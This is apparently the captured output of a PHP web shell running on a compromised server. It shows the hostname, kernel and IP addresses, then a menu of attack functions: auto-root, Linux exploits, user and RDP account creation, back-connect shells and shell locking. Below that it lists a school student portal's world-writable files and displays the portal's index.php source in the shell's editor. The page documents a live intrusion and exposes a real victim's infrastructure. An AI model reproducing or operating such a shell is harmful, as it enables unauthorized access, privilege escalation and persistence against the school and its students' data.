Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
data /
studentsportal /
[ HOME SHELL ]
Name
Size
Permission
Action
admit
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
datespicker
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
menu
[ DIR ]
drwxrwxrwx
scss
[ DIR ]
drwxrwxrwx
textEdit
[ DIR ]
drwxrwxrwx
AjaxDailyAttendanceSheet.php
3.03
KB
-rw-rw-rw-
AnsPaper.php
10.02
KB
-rw-rw-rw-
DueandPaidReport.php
4.56
KB
-rw-rw-rw-
QuestionPaper.php
16.07
KB
-rw-rw-rw-
RegistrationForm.php
44.94
KB
-rw-rw-rw-
admit.css
2.66
KB
-rw-rw-rw-
admit.php
7.78
KB
-rw-rw-rw-
ajaxAddAns.php
815
B
-rw-rw-rw-
ajaxDateWiseReport.php
18.07
KB
-rw-rw-rw-
attendanceReport.php
5.81
KB
-rw-rw-rw-
changePassword.php
3.93
KB
-rw-rw-rw-
check_grou_name.php
1.15
KB
-rw-rw-rw-
cheking_period.php
3.02
KB
-rw-rw-rw-
dailyAttendanceSheet.php
6.58
KB
-rw-rw-rw-
dashboard.php
8.84
KB
-rw-rw-rw-
dueReport.php
8.75
KB
-rw-rw-rw-
error_log
3.81
KB
-rw-rw-rw-
index.php
6.88
KB
-rw-rw-rw-
login.php
4.73
KB
-rw-rw-rw-
result.php
8.25
KB
-rw-rw-rw-
singleStdAttendanceReport.php
5.71
KB
-rw-rw-rw-
student_info.php
22.39
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php error_reporting(1); @session_start(); @date_default_timezone_set('Asia/Dhaka'); require_once("../db_connect/config.php"); require_once("../db_connect/conect.php"); $db = new database(); //print $_SESSION["useridid"]; if(isset($_GET["id"])) { $select_school="select * from project_info"; $cheke_school=$db->select_query($select_school); if($cheke_school) { $fetch_school_information=$cheke_school->fetch_array(); } ?> <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="Description" content="Skill Based IT" /> <link rel="icon" type="image/x-icon" href="../admin/all_image/hompag55eCodeSDMS2015.jpg" /> <title>Student Protal</title> <link rel="stylesheet" type="text/css" href="textEdit/css/style.css" /> <link rel="stylesheet" href="textEdit/redactor/redactor.css" /> <link rel="stylesheet" href="../css/loading/loading.css" /> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> <script src="textEdit/redactor/redactor.min.js"></script> <script type="text/javascript" src="../js/loading/pace.min.js"></script> <link href="../css/bootstrap.min.css" rel="stylesheet"> <link href="menu/menu.css" rel="stylesheet" type="text/css"> <style type="text/css"> html { overflow: scroll; overflow-x: hidden; } ::-webkit-scrollbar { width: 0px; /* remove scrollbar space */ background: transparent; /* optional: just make scrollbar invisible */ } /* optional: show position indicator in red */ ::-webkit-scrollbar-thumb { background: #FF0000; } </style> </head> <body> <div class="jumbotron" style="padding:10px;"> <div class="container-fluid" style="padding:0px;"> <label class="checkbox-inline"> <img src="../admin/all_image/logo.png" style="height: 80px; text-align: right;" class="img-responsive"> </label> <label class="checkbox-inline"> <h2 style="text-shadow: 0px 3px 3px #999;"> <?php print $fetch_school_information['institute_name'] ?></h2> <h4> (Student Portal)</h4> </label> </div> </div> <div id="header-area" class="header_area" style="margin-top: -30px;"> <div class="header_bottom"> <div class="container-fluid"> <div class="row"> <nav role="navigation" class="navbar navbar-default mainmenu"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <button type="button" data-target="#navbarCollapse" data-toggle="collapse" class="navbar-toggle"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <!-- Collection of nav links and other content for toggling --> <div id="navbarCollapse" class="collapse navbar-collapse"> <ul id="fresponsive" class="nav navbar-nav dropdown"> <li class="active"><a href="./">Home</a></li> <li><a href="student_info.php" target="ifrmae">Student Profile</a></li> <li><a href="attendanceReport.php" target="ifrmae">Attendance Report</a></li> <li><a href="admit.php" target="ifrmae">Admit Card</a></li> <li><a href="http://alhelalacademy.edu.bd/OnlineExam/QuestionPaper.php?exam=Ex-000000073&StdID=<?php print $_SESSION['useridid']?>" target="_blank" >Online Exam</a></li> <li><a href="../showResult.php" target="_blank">Result</a></li> <li class="dropdown"><a data-toggle="dropdown" class="dropdown-toggle">Student Accounts <span class="caret"></span></a> <ul class="dropdown-menu"> <li><a href="DueandPaidReport.php" target="ifrmae">Total Due & Paid Report</a></li> <li><a href="dueReport.php" target="ifrmae">Due Report</a></li> </ul> </li> <li><a href="changePassword.php" target="ifrmae" >Change Password</a></li> <li><a href="login.php?page=logout">Logout</a></li> <!-- <li><a href="#Download">lorem ipsum</a></li> --> </ul> </div> </nav> </div> </div> </div><!-- /.header_bottom --> </div> <script type="text/javascript"> (function($){ $(document).ready(function(){ $('ul.dropdown-menu [data-toggle=dropdown]').on('click', function(event) { event.preventDefault(); event.stopPropagation(); $(this).parent().siblings().removeClass('open'); $(this).parent().toggleClass('open'); }); }); })(jQuery); </script> <div class="col-md-12" style=""><br> <iframe src="dashboard.php" name="ifrmae" style="height:1500px; width:100%; border: 0px;"></iframe> </div> <div class="container-fluid"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 navbar-default" style="color:#000;"> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12" style="padding-left:0px; padding-top:25px; padding-bottom:25px;"> <b></a></b> </div> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12" align="right" style="padding-left:0px; padding-top:10px; padding-bottom:10px;"> Developed by <a href="http://www.sbit.com.bd/" target="_blank"> <img src="img/1.png" style="height: 50px;" alt="logo"> </a> </div> </div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <!-- Latest compiled and minified JavaScript --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script> </body> </html> <?php } else { print "<script>location='login.php'</script>"; } ?>
Close